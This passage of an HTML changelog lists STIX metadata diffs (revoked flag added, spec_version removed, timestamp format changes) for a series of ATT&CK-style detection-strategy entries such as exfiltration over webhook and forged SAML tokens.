16:34:50.670000+00:00</td></tr></tbody></table></details><hr><h4>[DET0153] Detection Strategy for Exfiltration Over Webhook</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0570] Detection Strategy for Exfiltration to Cloud Storage</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0318] Detection Strategy for Exfiltration to Code Repository</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0284] Detection Strategy for Exfiltration to Text Storage Sites</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0174] Detection Strategy for Exploitation for Credential Access</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.669000+00:00</td></tr></tbody></table></details><hr><h4>[DET0514] Detection Strategy for Exploitation for Privilege Escalation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0595] Detection Strategy for Exploitation for Stealth</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:26:05.352Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0406] Detection Strategy for Extended Attributes Abuse</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0217] Detection Strategy for Extra Window Memory (EWM) Injection on Windows</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.671000+00:00</td></tr></tbody></table></details><hr><h4>[DET0150] Detection Strategy for File Creation or Modification of Boot Files</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0051] Detection Strategy for File/Path Exclusions</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0344] Detection Strategy for Fileless Storage via Registry, WMI, and Shared Memory</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0495] Detection Strategy for Financial Theft</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0148] Detection Strategy for Forged SAML Tokens</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0171] Detection Strategy for Forged Web Cookies</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.695000+00:00</td></tr></tbody></table></details><hr><h4>[DET0260] Detection Strategy for Forged Web Credentials</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: 